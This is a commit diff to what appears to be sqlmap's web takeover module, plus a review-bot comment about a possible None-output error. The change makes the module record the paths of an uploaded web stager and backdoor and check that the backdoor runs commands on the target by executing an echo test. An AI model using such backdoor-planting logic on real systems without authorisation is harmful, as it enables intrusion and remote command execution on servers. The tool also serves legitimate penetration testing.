
Commit 0702dd7

committed
verify also that the web backdoor has been successfully uploaded
1 parent 6f6cd67 commit 0702dd7

1 file changed

Lines changed: 15 additions & 1 deletion


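--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -45,7 +45,9 @@ def __init__(self):
 self.webApi = None
 self.webBaseUrl = None
 self.webBackdoorUrl = None
+self.webBackdoorFilePath = None
 self.webStagerUrl = None
+self.webStagerFilePath = None
 self.webDirectory = None
 
 def webBackdoorRunCmd(self, cmd):
@@ -215,11 +217,13 @@ def webInit(self):
 localPath = directory
 uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory
 docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot
+
 if docRoot in uriPath:
 uriPath = uriPath.replace(docRoot, "/")
 uriPath = "/%s" % normalizePath(uriPath)
 else:
 webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url)
+
 if webDir:
 uriPath = "/%s" % webDir
 else:
@@ -233,6 +237,7 @@ def webInit(self):
 
 self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
 self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
+self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/')
 
 uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
 
@@ -244,6 +249,7 @@ def webInit(self):
 warnMsg += "on '%s'" % localPath
 logger.warn(warnMsg)
 warned.add(localPath)
+
 continue
 
 elif "<%" in uplPage or "<?" in uplPage:
@@ -306,8 +312,16 @@ def webInit(self):
 
 self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
 self.webDirectory = localPath
+self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/')
+
+testStr = "command execution test"
+output = self.webBackdoorRunCmd("echo %s" % testStr)
+
+if testStr in output:
+infoMsg = "the backdoor has been successfully "
+else:
+infoMsg = "the backdoor has probably been successfully "
 
-infoMsg = "the backdoor has probably been successfully "
 infoMsg += "uploaded on '%s' - " % self.webDirectory
 infoMsg += self.webBackdoorUrl
 logger.info(infoMsg)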
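Review bot: `if testStr in output:` at new line 320 will raise a TypeError if `webBackdoorRunCmd` returns None instead of a string. Its body is outside these hunks, so whether it can return None needs confirming, but a failed request or a response without the expected markup would plausibly produce that. A guard such as `if output and testStr in output:` keeps the "probably" fallback message reachable instead of aborting `webInit`. The path-normalisation expression is also duplicated for `webStagerFilePath` (new line 240) and `webBackdoorFilePath` (new line 315), and nothing in the visible hunks reads either attribute; a small private helper plus a one-line comment naming their consumer (presumably post-run cleanup of the uploaded files) would keep them in sync. `webInit` starts and ends outside the hunks shown.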
